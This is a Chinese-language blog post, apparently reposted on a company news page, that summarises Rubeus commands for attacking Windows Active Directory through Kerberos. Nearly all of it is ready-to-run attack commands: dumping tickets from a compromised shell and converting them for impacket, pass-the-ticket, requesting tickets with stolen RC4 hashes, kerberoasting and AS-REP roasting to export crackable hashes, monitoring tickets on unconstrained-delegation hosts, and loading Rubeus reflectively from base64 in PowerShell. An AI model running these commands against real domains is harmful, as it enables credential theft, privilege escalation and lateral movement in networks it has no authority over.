公司动态

Rubeus 命令总结

📅 2026/9/3 11:27:00
Rubeus 命令总结
囊空恐羞涩留得一钱看。导航0 前言1 票据管理2 票据提取3 票据请求4 委派滥用5 烘烤攻击6 杂项0、前言Rubeus 是一个专注于原始 Kerberos 交互和滥用的工具虽然其命令复杂且使用体验远不如 impacket 工具集但在域渗透中它仍是一个不可或缺的工具【尤其是它的票据提取功能】。这是因为在使用 impacket 等远程利用工具的前提是需要先拥有一个域用户凭据或票据而更多时候我们可能只是取得了目标网络某台域主机的 shell却并不能够知晓当前用户的密码这大大限制了使用 impacket 等远程工具对域进行枚举。而为了应对这种情况我们可以借助 Rubeus 的票据提取功能先导出当前 shell 中的用户票据然后再对票据进行 kirbir 转 ccache 处理最后就可以提供给 impacket 等工具进行使用了。【注也可以使用该票据去创建一个机器账户这样便有了一个用户凭证。】注在域渗透中支持票据认证的远程枚举工具impacket、nxc、pywerview。1、票据管理#1导入票据【注票据被导入到了内存中故所有 cmd 会话均可使用该票据。】 Rubeus.exe ptt /ticket:user.kirbi #2列出票据 Rubeus.exe klist #3以表格的方式列出票据 Rubeus.exe triage #4清理票据【注清理命令执行之后并不会立马就生效还需要等 1 分钟左右票据才会失效。】 Rubeus.exe purge #5查看票据详情 Rubeus.exe describe /ticket:user.kirbi #6票据续期【注续期旧票据之前必须确保旧票据还在有效期内否则无法成功。同时如果票据还没快到期那么这条命令是不会产生续期动作的。】 Rubeus.exe renew /ticket:test.kirbi /outfile:test.kirbi2、票据提取#1转储当前登录会话缓存中的票据【注这里边的 TGT 票据可能会不成功但 cifs 票据多试几次似乎可以成功。应用过程与下面一样。】 Rubeus.exe dump /nowrap ticket.txt #2转储当前登录会话缓存中有效的票据 Rubeus.exe tgtdeleg /nowrap ticket.txt #应用过程 echo -n ticket.kirbi 的 base64 字串 | base64 -d - user.kirbi impacket-ticketConverter user.kirbi user.ccache impacket-net -k -no-pass -dc-ip 192.168.56.50 -target-ip 192.168.56.50 testdc2012.skylark.com user -name admin #3票据监听捕获【注需要拥有本地管理员级别的权限才能够运行它可以实时监测本机有关票据请求的情况当目标机器存在非约束委派时该命令很有效。】 Rubeus.exe monitor /interval:5 /nowrap #应用捕获票据的过程和上面一样。TGT 票据和 TGS 票据的辨别TGT 的 ServiceName 值的格式是 krbtgt/SKYLARK.COM 的而 TGS 的 ServiceName 值的格式是 cifs/dc2012.skylark.com 的。3、票据请求#1以账户密码的方式请求 TGT 票据并导入到当前会话 Rubeus.exe asktgt /user:test /password:password123 /outfile:test.kirbi /ptt /nowrap #2以密码哈希的方式请求 TGT 票据 Rubeus.exe asktgt /user:test /rc4:2b576acbe6bcfda7294d6bd18041b8fe /ptt #3请求 TGS 票据步骤如下 #3.1首先生成一张 TGT 票据 Rubeus.exe asktgt /user:test /password:password123 /outfile:test-tgt.kirbi /nowrap #3.2然后拿着上面生成的 TGT 票据去请求 rc4 加密算法的 TGS 票据。 Rubeus.exe asktgs /ticket:test-tgt.kirbi /service:LDAP/dc2012.skylark.com,cifs/dc2012.skylark.com /ptt /enctype:rc4 /outfile:test-tgs.kirbi4、委派滥用待定…5、烘烤攻击#1查看可 kerberoast 的用户数量 Rubeus.exe kerberoast /stats #2导出可 kerberoast 的哈希【注册 SPN 的用户】 Rubeus.exe kerberoast /outfile:hashes.txt #3导出可 asreproast 的哈希【关闭预认证的用户】 Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt6、杂项#1创建一个新的cmd 窗口并为其注入票据【未成功】 Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /show /ticket:user.kirbi #2计算 RC4 格式的密码哈希 Rubeus.exe hash /password:Password123! #3计算多种加密格式的密码哈希 Rubeus.exe hash /password:Password123! /user:user /domain:skylark.comPowerShell 下关于 Rubeus 的别样调用方式[Convert]::ToBase64String([IO.File]::ReadAllBytes(C:\Temp\Rubeus.exe))|Out-File-Encoding ASCII C:\Temp\rubeus.txt$RubeusAssembly[System.Reflection.Assembly]::Load([Convert]::FromBase64String(aa...))[Rubeus.Program]::Main(dump /user:administrator.Split())我的博客园